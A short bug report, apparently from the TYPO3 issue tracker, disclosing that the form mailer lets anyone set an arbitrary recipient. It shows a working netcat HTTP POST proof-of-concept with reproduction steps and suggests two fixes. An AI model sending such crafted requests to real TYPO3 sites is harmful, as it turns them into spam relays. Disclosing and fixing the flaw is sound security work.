TYPO3 Core

Getting typo3 to send emails to arbirtary email adresses is as easy as typing in

---------------------------------------------
netcat -w 1 localhost 80 <<EOF
POST /index.php HTTP/1.1
Host: localhost
Referer: http://localhost/
Cookie: fe_typo_user=1bedf7ad7f
Content-Type: application/x-www-form-urlencoded
Content-Length: 182

subject=&recipient=me%40privacy.net&locationData=13%3Att_content%3A14&name=&formtype_mail=1
EOF
---------------------------------------------

on the console. The recipient can be set completely arbitrary!
[To reproduce, you have to replace "localhost" by an actual typo3 installation and get a coocie from the server.]

Insecure formail installations are routinely exploited by spammers to send massive amounts of emails.

I see two ways to fix this: Calculate a sha1 hash of all hidden fields in the form and a secret string and use this in another hidden form field. On return of the form, check the sha1 hash.
Or (even better): Don't put the recipient email address in the form but fetch it from the database.

(issue imported from #M278)